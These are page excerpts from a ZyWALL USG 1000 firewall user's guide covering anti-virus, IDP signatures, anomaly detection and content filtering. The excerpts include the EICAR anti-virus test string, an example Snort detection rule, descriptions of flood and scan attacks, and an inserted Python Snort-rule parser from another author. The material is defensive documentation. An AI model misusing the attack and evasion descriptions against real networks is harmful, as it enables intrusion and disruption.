Page 555: ...can detect polymorphic viruses. 2. When a virus is detected, an alert message is displayed in Microsoft Windows computers. Refer to Appendix C on page 981 if your Windows computer does not display the alert messages. 3. Changes to the ZyWALL's anti-virus settings affect new sessions, not the sessions that already existed before you applied the changed settings. 4. The ZyWALL does not scan the following fil...

Page 556: ...age 265 for how to register for the anti-virus service. You may need to customize the zones (in Network > Zone) used for the anti-virus scanning direction. 33.2 Anti-Virus Summary Screen: Click Configuration > Anti-X > Anti-Virus to display the configuration screen as shown next (Figure 391: Configuration > Anti-X > Anti-Virus > General). ...

Page 557: ...ble ASCII characters: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* . Policies: Add: Click this to create a new entry. Select an entry and click Add to create a new entry after the selected entry. Edit: Select an entry and click this to be able to modify it. Remove: Select an entry and click this to delete it. Activate: To turn on an entry, select it and click Activate. Inactivate: To turn off ...

Page 558: ...lick this link to go to the screen where you can register for the service. Signature Information: The following fields display information on the current signature set that the ZyWALL is using. Anti-Virus Engine Type: This field displays whether the ZyWALL is set to use ZyXEL's anti-virus engine or the one powered by Kaspersky. Upgrading the ZyWALL to firmware version 2.11 and updating the anti-virus s...

Page 559: ...e: Select this check box to have the ZyWALL apply this anti-virus policy to check traffic for viruses. From / To: Select source and destination zones for traffic to scan for viruses. The anti-virus policy has the ZyWALL scan traffic coming from the From zone and going to the To zone. Protocols to Scan: Select which protocols of traffic to scan for viruses. HTTP applies to traffic using TCP ports 80, 8080 an...

Page 560: ...ature(s). log: Create a log on the ZyWALL when a packet matches a signature(s). log alert: An alert is an e-mailed log for more serious events that may need more immediate attention. Select this option to have the ZyWALL send an alert when a packet matches a signature(s). White List / Black List Checking: Check White List: Select this check box to check files against the white list. Check Black List: Select this...

Page 561: ...word encryption. Select this check box to have the ZyWALL delete any ZIP files that it is not able to unzip. The ZyWALL cannot unzip password-protected ZIP files or a ZIP file within another ZIP file. There are also limits to the number of ZIP files that the ZyWALL can concurrently unzip. Note: The ZyWALL's firmware package cannot go through the ZyWALL with this option enabled. The ZyWALL classifies the...

Page 562: ... LABEL / DESCRIPTION. Enable Black List: Select this check box to log and delete files with names that match the black list patterns. Use the black list to log and delete files with names that match the black list patterns. Add: Click this to create a new entry. Edit: Select an entry and click this to be able to modify it. Remove: Select an entry and click this to delete it. Activate: To turn on an entry, selec...

Page 563: ...n for viruses. Use up to 80 characters. Alphanumeric characters, underscores (_), dashes (-), question marks (?) and asterisks (*) are allowed. A question mark (?) lets a single character in the file name vary. For example, use "a?.zip" (without the quotation marks) to specify aa.zip, ab.zip and so on. Wildcards (*) let multiple files match the pattern. For example, use "*a.zip" (without the quotation marks) to specify any file that ends wi...

Page 564: ...virus check on files with names that match the white list patterns. Use the white list to have the ZyWALL not perform the anti-virus check on files with names that match the white list patterns. Add: Click this to create a new entry. Edit: Select an entry and click this to be able to modify it. Remove: Select an entry and click this to delete it. Activate: To turn on an entry, select it and click Activate. I...

Page 565: ...making Internet Explorer run slowly and the computer may be becoming unresponsive, just click No to continue. Click a column's heading cell to sort the table entries by that column's criteria. Click the heading cell again to reverse the sort order (Figure 396: Configuration > Anti-X > Anti-Virus > Signature > Search by Severity). ...

Page 566: ...ZyWALL search the signatures based on your specified criteria. Query all signatures and export: Click Export to have the ZyWALL save all of the anti-virus signatures to your computer in a .txt file. Query Result: This is the entry's index number in the list. Name: This is the name of the anti-virus signature. Click the Name column heading to sort your search results in ascending or descending order accord...

Page 567: ... TYPE / DESCRIPTION. File Infector: This is a small program that embeds itself in a legitimate program. A file infector is able to copy and attach itself to other programs that are executed on an infected computer. Boot Sector Virus: This type of virus infects the area of a hard drive that a computer reads and executes during startup. The virus causes computer crashes and, to some extent, renders the infect...

Page 568: ...o share the resources (such as CPU time) on the computer for file inspection. You have to update the virus signatures and/or perform virus scans on all computers in the network regularly. A network-based anti-virus (NAV) scanner is often deployed as a dedicated security device (such as your ZyWALL) on the network edge. NAV scanners inspect real-time data traffic (such as E-mail messages or web) that tends to...

Page 569: ...age 573 to add a new profile, edit an existing profile or delete an existing profile. Use the Anti-X > IDP > Custom Signature screens (Section 34.8 on page 588) to create a new signature, edit an existing signature, delete existing signatures or save signatures to your computer. 34.1.2 What You Need To Know: Packet Inspection Signatures: A signature identifies a malicious or suspicious packet and specifies an ...

Page 570: ...uration. Changes to the ZyWALL's IDP settings affect new sessions, not the sessions that already existed before you applied the changed settings. Finding Out More: See Section 6.5.20 on page 110 for IDP prerequisite information. See Chapter 35 on page 605 for anomaly detection and protection. See Section 34.9 on page 600 for more information on network-based intrusions. See Section 34.6.2 on page 580 for...

Page 571: ...ure 397: Configuration > Anti-X > IDP > General. The following table describes the labels in this screen. Table 152: Configuration > Anti-X > IDP > General. LABEL / DESCRIPTION. General Settings: Enable Signature Detection: You must register for IDP service in order to use packet inspection signatures. If you don't have a standard license, you can register for a once-off trial one. Policies: Use this list to specify which...

Page 572: ...s LAN zone interfaces. The ZyWALL does not check packets traveling from a LAN computer to another LAN computer on the same subnet. From WAN To WAN means packets that come in from the WAN zone and the ZyWALL routes back out through the WAN zone. IDP Profile: This field shows which IDP profile is bound to which traffic direction. Select an IDP profile to apply to the entry's traffic direction. Configure t...

Page 573: ...n anomaly detection. Current Version: This field displays the IDP signature set version number. This number gets larger as the set is enhanced. Signature Number: This field displays the number of IDP signatures in this set. This number usually gets larger as the set is enhanced. Older signatures and rules may be removed if they are no longer applicable or have been supplanted by newer ones. Released Date: ...

Page 574: ...not log alerts, and no action is taken on packets that trigger them. wan: Signatures for all services are enabled. Signatures with a medium, high or severe severity level (greater than two) generate logs (not log alerts), and no action is taken on packets that trigger them. Signatures with a very low or low severity level (less than or equal to two) are disabled. lan: This profile is most suitable for common LAN...

Page 575: ... SMTP, SNMP, SQL, TELNET, Oracle, MySQL) are enabled. Signatures with a high or severe severity level (greater than three) generate log alerts and cause packets that trigger them to be dropped. Signatures with a low or medium severity level (two or three) generate logs (not log alerts), and no action is taken on packets that trigger them. Signatures with a very low severity level (one) are disabled. OK: Click OK to s...

Page 576: ...the false alarms. When you're satisfied that they have been reduced to an acceptable level, you could then create an inline profile whereby you configure appropriate actions to be taken when a packet matches a signature. 34.5.1 Procedure To Create a New Profile: To create a new profile: 1. Click the Add icon in the Configuration > Anti-X > IDP > Profile screen to display a pop-up screen allowing you to choose...

Page 577: ...figuration > Anti-X > IDP > Profile and then add a new or edit an existing profile, select Packet inspection). Packet inspection signatures examine the contents of a packet for malicious data. They operate at layer 4 to layer 7. 34.6.1 Profile Group View Screen (Figure 400: Configuration > Anti-X > IDP > Profile > Edit > Group View). ...

Page 578: ... by criteria such as name, ID, severity, attack type, vulnerable attack platforms, service category, log options or actions. Activate: To turn on an entry, select it and click Activate. Inactivate: To turn off an entry, select it and click Inactivate. Log: To edit an item's log option, select it and use the Log icon. These are the log options: no: Select this option on an individual signature or a complete service ...

Page 579: ... the ZyWALL send a reset to both the sender and receiver when a packet matches the signature. If it is a TCP attack packet, the ZyWALL will send a packet with a RST flag to the receiver and sender. If it is an ICMP or UDP attack packet, the ZyWALL will send an ICMP unreachable packet. This is the entry's index number in the list. Status: The activate (light bulb) icon is lit when the entry is active and di...

Page 580: ...in the final profile screen to complete the profile. Table 155: Configuration > Anti-X > IDP > Profile > Group View (continued). LABEL / DESCRIPTION. Table 156: Policy Types. POLICY TYPE / DESCRIPTION. P2P: Peer-to-peer (P2P) is where computing devices link directly to each other and can directly initiate communication with each other; they do not need an intermediary. A device can be both the client and the server. In the ...

Page 581: ...he overflow buffer region to obtain control of the system, install a backdoor or use the victim to launch attacks on other devices. Virus/Worm: A computer virus is a small program designed to corrupt and/or alter the operation of other legitimate programs. A worm is a program that is designed to copy itself from one computer to another on a network. A worm's uncontrolled replication consumes system res...

Page 582: ...n that group. If you select original setting for service group logs and/or actions, all signatures within that group are returned to their last-saved settings (Figure 401: Configuration > Anti-X > IDP > Profile > Edit > IDP Service Group). 34.6.4 Profile Query View Screen: Click Switch to query view in the screen as shown in Figure 400 on page 577 to go to a signature query screen. In the query view screen you can ...

Page 583: ...oup View screen. Switch to group view: Click this button to go to the IDP profile group view screen, where IDP signatures are grouped by service and you can configure activation, logs and/or actions. Query Signatures: Select the criteria on which to perform the search. Search all custom signatures: Select this check box to search for signatures you created or imported in the Custom Signatures screen. You c...

Page 584: ...trl key if you want to make multiple selections. Action: Search for signatures by the response the ZyWALL takes when a packet matches a signature. See Table 155 on page 578 for action details. Hold down the Ctrl key if you want to make multiple selections. Activation: Search for activated and/or inactivated signatures here. Log: Search for signatures by log option here. See Table 155 on page 578 for option...

Page 585: ...34.6.5 Query Example: This example shows a search with these criteria: Severity: severe and high. Attack Type: DDoS. Platform: Windows 2000 and Windows XP computers. Service: Any ...

Page 586: ...Actions: Any (Figure 403: Query Example Search Criteria; Figure 404: Query Example Search Results). ...

Page 587: ...cates IP version 4. IHL: IP Header Length is the number of 32-bit words forming the total length of the header (usually five). Type of Service: The Type of Service, also known as Differentiated Services Code Point (DSCP), is usually set to 0, but may indicate particular quality of service needs from the network. Total Length: This is the size of the datagram in bytes. It is the combined length of the header and...

Page 588: ... router or bridge where the packet is not protected by a link layer cyclic redundancy check. Packets with an invalid checksum are discarded by all nodes in an IP network. Source IP Address: This is the IP address of the original sender of the packet. Destination IP Address: This is the IP address of the final destination of the packet. Options: IP options is a variable-length list of IP options for a dat...

Page 589: ...n entry and click this to be able to modify it Remove Select an entry and click this to delete it Activate To turn on an entry select it and click Activate Export To save an entry or entries as a file on your computer select them and click Export Click Save in the file download dialog box and then select a location and name for the file Custom signatures must end with the rules file name extension...

Page 590: ...mport custom signatures previously saved to your computer to the ZyWALL. Note: the name of the complete custom signature file on the ZyWALL is custom.rules. If you import a file named custom.rules, then all custom signatures on the ZyWALL are overwritten with the new file. If this is not your intention, make sure that the files you import are not named custom.rules. File Path: type the file path and name ...

Page 591: ...Try to write signatures that target a vulnerability (for example, a certain type of traffic on certain operating systems) instead of a specific exploit. Figure 407 Configuration > Anti-X > IDP > Custom Signatures > Add/Edit ...

Page 592: ... that is, the operating systems you want to protect from this intrusion. SGI refers to Silicon Graphics Incorporated, who manufactures multi-user Unix workstations that run the IRIX operating system (SGI's version of UNIX). A router is an example of a network device. Service: select the IDP service group that the intrusion exploits or targets. See Table 157 on page 581 for a list of IDP service groups. The ...

Page 593: ...ual, Smaller or Greater and then type in a number. IP Options: IP options is a variable-length list of IP options for a datagram that define IP Security Option, IP Stream Identifier (security and handling restrictions for the military), Record Route (have each router record its IP address), Loose Source Routing (specifies a list of IP addresses that must be traversed by the datagram), Strict Source Routing (spe...

Page 594: ...ence Number: use this field to check for a specific TCP sequence number. Ack Number: use this field to check for a specific TCP acknowledgement number. Window Size: use this field to check for a specific TCP window size. Transport Protocol: UDP. Port: select the check box and then enter the source and destination UDP port numbers that will trigger this signature. Transport Protocol: ICMP. Type: use this field ...

Page 595: ...er. Decode as URI: a Uniform Resource Identifier (URI) is a string of characters for identifying an abstract or physical resource (RFC 2396). A resource can be anything that has identity, for example an electronic document, an image, a service (today's weather report for Taiwan), or a collection of other resources. An identifier is an object that can act as a reference to something that has identity. Example URIs a...

Page 596: ...mation about the attack as you can. The more specific your signature, the less chance it will cause false positives. As an example, say you want to check if your router is being overloaded with DNS queries, so you create a signature to detect DNS query traffic. OK: click this button to save your changes to the ZyWALL and return to the summary screen. Cancel: click this button to return to the summary scree...

Page 597: ...yzer (also known as a network or protocol analyzer) such as Wireshark or Ethereal to investigate some more. Figure 408 DNS Query Packet Details. From the details about the DNS query, you see that the protocol is UDP and the port is 53. The type of DNS packet is standard query and the Flag is 0x0100 with an offset of 2. Therefore, enter 010 as the first pattern ...

Page 598: ...hown in the following figure. Figure 409 Example Custom Signature. 34.8.3 Applying Custom Signatures. After you create your custom signature, it becomes available in the IDP service group category in the Configuration > Anti-X > IDP > Profile > Edit screen. Custom signatures have an SID from 9000000 to 9999999 ...

Page 599: ...u may also want to configure an alert if it is for a serious attack and needs immediate attention. After you apply the signature to a zone, you can see if it works by checking the logs (Monitor > Log). The Priority column shows warn for signatures that are configured to generate a log only. It shows critical for signatures that are configured to generate a log and alert. All IDP signatures come under the I...

Page 600: ...ver in with the goal of accessing confidential information or destroying information on a computer. You must install a host IDP directly on the system being protected. It works closely with the operating system, monitoring and intercepting system calls to the kernel or APIs in order to prevent attacks as well as log them. Disadvantages of host IDPs are that you have to install them on each device that...

Page 601: ...Snort rules are divided into two logical sections, the rule header and the rule options, as shown in the following example: alert tcp any any -> 192.168.1.0/24 111 (content:"|00 01 a5|"; msg:"mountd access";). The text up to the first parenthesis is the rule header and the section enclosed in parentheses contains the rule options. The words before the colons in the rule options section are the option keywords. The r...

Page 602: ...dow Size: window. Transport Protocol UDP: in Snort rule header. Port: in Snort rule header. Transport Protocol ICMP: Type: itype; Code: icode; ID: icmp_id; Sequence Number: icmp_seq. Payload Options: Snort rule options. Payload Size: dsize. Offset (relative to start of payload): offset. Relative to end of last match: distance. Content: content. Case insensitive: nocase. Decode as URI: uricontent. Table 162 ZyWALL Snort Equivale...
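The following is an added example (not ZyXEL's code) that parses a Snort-style rule of the shape shown on page 601 and maps its option keywords onto the ZyWALL custom signature fields listed in Table 162; the parser, function names and the constructed DNS query rule used in the comments are my own assumptions, and only the option keywords the guide lists are mapped.

```python
"""Snort rule -> ZyWALL custom signature field mapping (added example, not ZyXEL code)."""

# Snort option keyword -> ZyWALL custom signature field, as listed in Table 162.
ZYWALL_FIELD = {
    "window": "Window Size",
    "itype": "Type",
    "icode": "Code",
    "icmp_id": "ID",
    "icmp_seq": "Sequence Number",
    "dsize": "Payload Size",
    "offset": "Offset (relative to start of payload)",
    "distance": "Relative to end of last match",
    "content": "Content",
    "nocase": "Case insensitive",
    "uricontent": "Decode as URI",
}
CUSTOM_SID_RANGE = (9000000, 9999999)  # custom signature SID range given by the guide


def split_options(body):
    """Split 'k:v; k2; k3:"a;b";' into (keyword, value) pairs, honouring quotes.
    Keyword-only options such as nocase get the value None."""
    opts, buf, quoted = [], "", False
    for ch in body:
        if ch == '"':
            quoted = not quoted
        if ch == ";" and not quoted:
            item = buf.strip()
            if item:
                key, _, val = item.partition(":")
                opts.append((key.strip(), val.strip().strip('"') if val else None))
            buf = ""
        else:
            buf += ch
    if buf.strip():
        raise ValueError("option not terminated by ';': " + buf.strip())
    return opts


def parse_snort_rule(rule):
    """Split a rule into its header (text before the first parenthesis) and its
    options (the parenthesised section), as the guide describes."""
    head, paren, body = rule.strip().partition("(")
    if not paren or not body.endswith(")"):
        raise ValueError("rule options must be enclosed in parentheses")
    fields = head.split()
    if len(fields) != 7:
        raise ValueError("header must be: action proto src sport -> dst dport")
    action, proto, src, sport, direction, dst, dport = fields
    if direction not in ("->", "<>"):
        raise ValueError("bad direction operator: " + direction)
    return {"action": action, "protocol": proto, "src": src, "src_port": sport,
            "direction": direction, "dst": dst, "dst_port": dport,
            "options": split_options(body[:-1])}


def to_zywall_fields(rule):
    """Map a parsed rule onto the ZyWALL custom signature screen fields.
    Transport protocol and ports come from the header; payload options from
    the option keywords; anything without a ZyWALL equivalent is reported."""
    parsed = parse_snort_rule(rule)
    out = {"Transport Protocol": parsed["protocol"].upper(),
           "Port": parsed["src_port"] + " -> " + parsed["dst_port"]}
    unmapped = []
    for key, val in parsed["options"]:
        if key == "sid":
            sid = int(val)
            lo, hi = CUSTOM_SID_RANGE
            if not lo <= sid <= hi:
                raise ValueError("custom signature SID %d outside %d-%d" % (sid, lo, hi))
            out["SID"] = sid
        elif key in ZYWALL_FIELD:
            out[ZYWALL_FIELD[key]] = True if val is None else val
        else:
            unmapped.append(key)  # e.g. msg: no equivalent in Table 162
    out["unmapped"] = unmapped
    return out


if __name__ == "__main__":
    # Constructed rule modelled on the guide's DNS query example (UDP/53, 01 00 at offset 2).
    print(to_zywall_fields(
        'alert udp any any -> any 53 (content:"|01 00|"; offset:2; nocase; sid:9000001;)'))
```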

Page 605: ...t inspection. 2. ADP traffic and anomaly rules are updated when you upload new firmware. This is different from the IDP packet inspection signatures and the system protect signatures you download from myZyXEL.com. 35.1.2 What You Can Do in this Chapter. Use Anti-X > ADP > General (Section 35.2 on page 607) to turn anomaly detection on or off and apply anomaly profiles to traffic directions. Use Anti-X > ADP > Pro...

Page 606: ...apply ADP profiles to traffic flowing from one zone to another. Base ADP Profiles: base ADP profiles are templates that you use to create new ADP profiles. The ZyWALL comes with several base profiles. See Table 164 on page 609 for details on ADP base profiles. ADP Policy: an ADP policy refers to application of an ADP profile to a traffic flow. Finding Out More: see Section 6.5.21 on page 110 for ADP prere...

Page 607: ...lowing in a specific direction. Edit the policies directly in the table. Add: click this to create a new entry. Select an entry and click Add to create a new entry after the selected entry. Edit: select an entry and click this to be able to modify it. Remove: select an entry and click this to delete it. Activate: to turn on an entry, select it and click Activate. Inactivate: to turn off an entry, select it and ...

Page 608: ...LAN means packets traveling from a computer on one LAN subnet to a computer on another LAN subnet via the ZyWALL's LAN zone interfaces. The ZyWALL does not check packets traveling from a LAN computer to another LAN computer on the same subnet. From WAN To WAN means packets that come in from the WAN zone and the ZyWALL routes back out through the WAN zone. Note: depending on your network topology and t...

Page 609: ...ion > Anti-X > ADP > Profile. Table 164 Base Profiles. BASE PROFILE / DESCRIPTION. none: all traffic anomaly and protocol anomaly rules are disabled. No logs are generated nor actions are taken. all: all traffic anomaly and protocol anomaly rules are enabled. Rules with a high or severe severity level (greater than three) generate log alerts and cause packets that trigger them to be dropped. Rules with a very low, lo...

Page 610: ... could then create an inline profile whereby you configure appropriate actions to be taken when a packet matches a rule. ADP profiles consist of traffic anomaly profiles and protocol anomaly profiles. To create a new profile, select a base profile (see Table 164 on page 609) and then click OK to go to the profile details screen. Type a new profile name, enable or disable individual rules and then edit th...

Page 611: ...pter 35 ADP. ZyWALL USG 1000 User's Guide 611. ...belonging to this profile, make sure you have clicked OK or Save to save the changes before selecting the Traffic Anomaly tab. Figure 415 Profiles: Traffic Anomaly ...

Page 612: ...olds and sample times are set high, so most traffic anomaly attacks will be detected; however, you will have more logs and false positives. Block Period: specify for how many seconds the ZyWALL blocks all packets from being sent to the victim (destination) of a detected anomaly attack. Activate: to turn on an entry, select it and click Activate. Inactivate: to turn off an entry, select it and click Inactivate. ...

Page 613: ...tab. Name: this is the name of the traffic anomaly rule. Click the Name column heading to sort in ascending or descending order according to the rule name. Log: these are the log options. To edit this, select an item and use the Log icon. Action: this is the action the ZyWALL should take when a packet matches a rule. To edit this, select an item and use the Action icon. Threshold: for flood detection you can s...

Page 614: ...Figure 416 Profiles: Protocol Anomaly ...

Page 615: ...id unique profile names: MyProfile, mYProfile, Mymy12_3-4. These are invalid profile names: 1mYProfile, My Profile, MyProfile?, Whatalongprofilename123456789012. HTTP Inspection, TCP Decoder, UDP Decoder, ICMP Decoder. Activate: to turn on an entry, select it and click Activate. Inactivate: to turn off an entry, select it and click Inactivate. Log: to edit an item's log option, select it and use the Log icon. Select whe...

Page 616: ...t both: select this action on an individual signature or a complete service group to have the ZyWALL send a reset to both the sender and receiver when a packet matches the rule. If it is a TCP attack packet, the ZyWALL will send a packet with a RST flag to the receiver and sender. If it is an ICMP or UDP attack packet, the ZyWALL will send an ICMP unreachable packet. This is the entry's index number in ...

Page 617: ... Portscan. IP Portscan: an IP port scan searches not only for TCP, UDP and ICMP protocols in use by the remote computer, but also additional IP protocols such as EGP (Exterior Gateway Protocol) or IGP (Interior Gateway Protocol). Determining these additional protocols can help reveal if the destination device is a workstation, a printer or a router. OK: click OK to save your settings to the ZyWALL, complete th...

Page 618: ... that is, they are one-to-many port scans. One host scans a single port on multiple hosts. This may occur when a new exploit comes out and the attacker is looking for a specific service. These are some port sweep types: TCP Portsweep, UDP Portsweep, IP Portsweep, ICMP Portsweep. Filtered Port Scans: a filtered port scan may indicate that there were no network errors (ICMP unreachables or TCP RSTs) or response...

Page 619: ... address of the network. The router will broadcast the ICMP echo request packet to all hosts on the network. If there are numerous hosts, this will create a large amount of ICMP echo request and response traffic. If an attacker (A) spoofs the source IP address of the ICMP echo request packet, the resulting ICMP traffic will not only saturate the receiving network (B), but also the network of the spoofed source I...

Page 620: ...all outstanding SYN/ACK responses on a backlog queue. SYN/ACKs are only moved off the queue when an ACK comes back or when an internal timer ends the three-way handshake. Once the queue is full, the system will ignore all incoming SYN requests, making the system unavailable for other users. Figure 419 SYN Flood. LAND Attack: in a LAND attack, hackers flood SYN packets into a network with a spoofed source ...

Page 621: ...r a space delimiter. Apache uses this, so if you have an Apache server you need to enable this option. ASCII ENCODING ATTACK: this rule can detect attacks where malicious attackers use ASCII encoding to encode attack strings. Attackers may use this method to bypass system parameter checks in order to get information or privileges from a web server. BARE BYTE UNICODING ENCODING ATTACK: bare byte encoding ...

Page 622: ...ted by both Apache and IIS web servers. OVERSIZE CHUNK ENCODING ATTACK: this rule is an anomaly detector for abnormally large chunk sizes. This picks up the Apache chunk encoding exploits and may also be triggered on HTTP tunneling that uses chunk encoding. OVERSIZE REQUEST URI DIRECTORY ATTACK: this rule takes a non-zero positive integer as an argument. The argument specifies the max character director...

Page 623: ...ean the packet was truncated. TTCP DETECTED ATTACK: T/TCP provides a way of bypassing the standard three-way handshake found in TCP, thus speeding up transactions. However, this could lead to unauthorized access to the system by spoofing connections. UNDERSIZE LEN ATTACK: this is when a TCP packet is sent which has a TCP datagram length of less than 20 bytes. This may cause some applications to crash. UNDE...

Page 624: ...less than the ICMP header length. This may cause some applications to crash. TRUNCATED TIMESTAMP HEADER ATTACK: this is when an ICMP packet is sent which has an ICMP datagram length of less than the ICMP Time Stamp header length. This may cause some applications to crash. Table 168 HTTP Inspection and TCP/UDP/ICMP Decoders (continued). LABEL / DESCRIPTION ...

Page 627: ...n web features such as cookies and/or block access to specific web sites. It can also block access to specific categories of web site content. You can create different content filter policies for different addresses, schedules, users or groups and content filter profiles. For example, you can configure one policy that blocks John Doe's access to arts and entertainment web pages during the workday and an...

Page 628: ...bers. When a matching policy is found, the content filter allows or blocks the request depending on the settings of the filtering profile specified by the policy. Some requests may not match any policy. The ZyWALL allows the request if the default policy is not set to block. The ZyWALL blocks the request if the default policy is set to block. External Web Filtering Service: when you register for and enab...

Page 629: ...ding Out More: see Section 6.5.22 on page 110 for related information on these screens. See Section 36.7 on page 649 for content filtering background technical information. 36.1.3 Before You Begin. You must configure an address object, a schedule object and a filtering profile before you can set up a content filter policy. You must subscribe to use the external database content filtering (see the Licensi...

Page 630: ...t Filter Report Service: select this check box to have the ZyWALL collect category-based content filtering statistics. Policies: this is a list of the configured content filter policies. Block web access when no policy is applied: select this check box to stop users from accessing the Internet by default when their attempted access does not match a content filter policy. Add: click this to create a new e...

Page 631: ...tent filter policy. You can define different policies for different time periods; none means the content filter policy applies all of the time. User: this column displays the individual or group to which this policy applies; any means the content filter policy applies to all of the web access requests that the ZyWALL receives from any user. Filter Profile: this column displays the name of the content fil...

Page 632: ...er is not active. You can view content filter reports after you register the ZyWALL and activate the subscription service in the Registration screen (see Chapter 37 on page 651). License Type: this read-only field displays what kind of service registration you have for the content filtering database. None displays if you have not successfully registered and activated the service. Standard displays if you...

Page 633: ...s access to certain categories after the work day is over. Select none to have the content filter policy apply all of the time. Address: select the address or address group for which you want to use this policy. Select any to have the content filter policy apply to all of the web access requests that the ZyWALL receives from any IP address. Filter Profile: use the drop-down list box to select the conten...

Page 634: ... X > Content Filter > Filter Profile > Add or Edit to open the Categories screen. Use this screen to enable external database content filtering and select which web site categories to block and/or log. Note: you must register for external content filtering before you can use it. See Section 11.2 on page 267 for how to register. Table 171 Configuration > Anti-X > Content Filter > Filter Profile. LABEL / DESCRIPTION. Ad...

Page 635: ...Chapter 36 Content Filtering. ZyWALL USG 1000 User's Guide 635. See Chapter 37 on page 651 for how to view content filtering reports. Figure 423 Configuration > Anti-X > Content Filter > Filter Profile > Add ...

Page 636: ... after you register the ZyWALL and activate the subscription service in the Registration screen (see Chapter 37 on page 651). License Type: this read-only field displays what kind of service registration you have for the content filtering database. None displays if you have not successfully registered and activated the service. Standard displays if you have successfully registered the ZyWALL and activat...

Page 637: ...at match the other categories that you select below. When external database content filtering blocks access to a web page, it displays the denied access message that you configured in the Content Filter General screen along with the category of the blocked web page. Select Log to record attempts to access web pages that match the other categories that you select below. Action for Unrated Web Pages: sel...

Page 638: ...ntent filtering's license key is invalid. Select Log to record attempts to access web pages that occur when the external content filtering database is unavailable. Content Filter Category Service Timeout: specify a number of seconds (1 to 60) for the ZyWALL to wait for a response from the external content filtering server. If there is still no response by the time this period expires, the ZyWALL blocks o...

Page 639: ...onnect and send user info, sites that make extensive use of tracking cookies without a posted privacy statement, and sites to which browser hijackers redirect users. Usually does not include sites that can be marked as Spyware/Malware. Note: sites rated as spyware effects typically have a second category assigned with them. Managed Categories: these are categories of web pages based on their content. Sele...

Page 640: ...s not include pages that sell gambling-related products or machines. It also does not include pages for offline casinos and hotels, as long as those pages do not meet one of the above requirements. Violence/Hate/Racism: this category includes pages that depict extreme physical harm to people or property, or that advocate or provide instructions on how to cause such harm. It also includes pages that advo...

Page 641: ...hat offer educational information, distance learning and trade school information or programs. It also includes pages that are sponsored by schools, educational facilities, faculty or alumni groups. Cultural/Charitable Organization: this category includes pages that nurture cultural understanding and foster volunteerism, such as 4H, the Lions and Rotary Clubs. Also encompasses non-profit associations that ...

Page 642: ...at provide assistance in finding employment and tools for locating prospective employers. News/Media: this category includes pages that primarily report information or comments on current events or contemporary issues of the day. It also includes radio stations and magazines. It does not include pages that can be rated in other categories. Personals/Dating: this category includes pages that promote inte...

Page 643: ...ntially act as your personal hard drive on the Internet. Remote Access Tools: this category includes pages that primarily focus on providing information about and/or methods that enable authorized access to and use of a desktop computer or private network remotely. Shopping: this category includes pages that provide or advertise the means to obtain goods or services. It does not include pages that can...

Page 644: ... and sharing across a network without dependence on a central server. Streaming Media/MP3s: this category includes pages that sell, deliver or stream music or video content in any format, including sites that provide downloads for such viewers. Proxy Avoidance: this category includes pages that provide information on how to bypass proxy server/appliance features or gain access to URLs in any way that by...

Page 645: ...es sites that are part of the Web and email spam ecosystem. Sites that are determined to be clearly malicious or benign will be placed in a different category. Alternative Sexuality/Lifestyles: this category includes pages that provide information, promote or cater to alternative sexual expressions in their myriad forms. It includes, but is not limited to, the full range of non-traditional sexual practic...

Page 646: ...est: you can check which category a web page belongs to. Enter a web site URL in the text box. Test Against Local Cache: click this button to see the category recorded in the ZyWALL's content filtering database for the web page you specified, if the database has an entry for it. Test Against Content Filter Category Server: click this button to see the category recorded in the external content filter serv...

Page 647: ...keywords from the filter list. Figure 425 Configuration > Anti-X > Content Filter > Filter Profile > Customization. The following table describes the labels in this screen. Table 173 Configuration > Anti-X > Content Filter > Filter Profile > Customization. LABEL / DESCRIPTION. Name: enter a descriptive name for this content filtering profile. You may use 1-31 alphanumeric characters, underscores (_) or dashes (-), but the fi...

Page 648: ...y pointing to this proxy server. Allow Java/ActiveX/Cookies/Web proxy to trusted web sites: when this box is selected, the ZyWALL will permit Java, ActiveX and Cookies from sites on the Trusted Web Sites list to the LAN. In certain cases it may be desirable to allow Java, ActiveX or Cookies from sites that are known and trusted. Trusted Web Sites: these are sites that you want to allow access to, regardles...

Page 649: ... This section allows you to block Web sites with URLs that contain certain keywords in the domain name or IP address. Add: click this to create a new entry. Edit: select an entry and click this to be able to modify it. Remove: select an entry and click this to delete it. Blocked URL Keywords: this list displays the keywords already added. Enter a keyword or a numerical IP address to block. You can also ente...

Page 650: ...onfiguration. 3. Use the Content Filter Cache screen to configure how long a web site address remains in the cache, as well as to view those web site addresses (see Section 10.18 on page 255). All of the web site address records are also cleared from the local cache when the ZyWALL restarts. 4. If the ZyWALL has no record of the web site, it queries the external content filter database and simultaneously send...

Page 651: ... register your device and activate the subscription services. 37.2 Viewing Content Filter Reports. Content filtering reports are generated statistics and charts of access attempts to web sites belonging to the categories you selected in your device's content filter screen. You need to register your iCard before you can view content filtering reports. Alternatively, you can also view content filtering rep...

Page 652: ...Chapter 37 Content Filter Reports. ZyWALL USG 1000 User's Guide 652. 2. Fill in your myZyXEL.com account information and click Login. Figure 427 myZyXEL.com Login ...

Page 653: ...ys. Click your ZyWALL's model name and/or MAC address under Registered ZyXEL Products (the ZyWALL 70 is shown as an example here). You can change the descriptive name for your ZyWALL using the Rename button in the Service Management screen (see Figure 429 on page 654). Figure 428 myZyXEL.com Welcome ...

Page 654: ... 4. In the Service Management screen, click Content Filter in the Service Name column to open the content filter reports screens. Figure 429 myZyXEL.com Service Management. 5. In the Web Filter Home screen, click the Reports tab. Figure 430 Content Filter Reports Main Screen ...

Page 655: ...orts. Figure 431 Content Filter Reports Report Home. 7. Select a time period in the Date Range field, either Allowed or Blocked in the Action Taken field, and a category (or enter the user name if you want to view single-user reports), and click Run Report. The screens vary according to the report type you selected in the Report Home screen ...

Page 656: ...8. A chart and/or list of requested web site categories displays in the lower half of the screen. Figure 432 Global Report Screen Example ...

Page 657: ...9. You can click a category in the Categories report or click URLs in the Report Home screen to see the URLs that were requested. Figure 433 Requested URLs Example ...

Page 659: ...0 to have the ZyWALL check e mail against DNS Black Lists 38 1 2 What You Need to Know White list Configure white list entries to identify legitimate e mail The white list entries have the ZyWALL classify any e mail that is from a specified sender or uses a specified header field and header value as being legitimate see E mail Headers on page 660 for more on mail headers The anti spam feature chec...

Page 660: ...use SMTP to send messages to a mail server The older POP2 requires SMTP for sending messages while the newer POP3 can be used with or without it This is why many e mail applications require you to specify both the SMTP server and the POP or IMAP server even though they may actually be the same server The ZyWALL s anti spam feature checks SMTP TCP port 25 and POP3 TCP port 110 e mails The anti spam...

